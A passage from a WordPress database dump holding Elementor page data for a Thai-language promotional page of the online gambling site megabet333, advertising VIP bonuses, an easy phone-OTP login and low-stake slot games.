400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1086,138,'_thumbnail_id','60'),(1087,138,'_elementor_edit_mode','builder'),(1088,138,'_elementor_template_type','wp-page'),(1089,138,'_elementor_version','3.32.5'),(1090,138,'_elementor_pro_version','3.32.3'),(1091,138,'_wp_page_template','default'),(1092,138,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1093,138,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 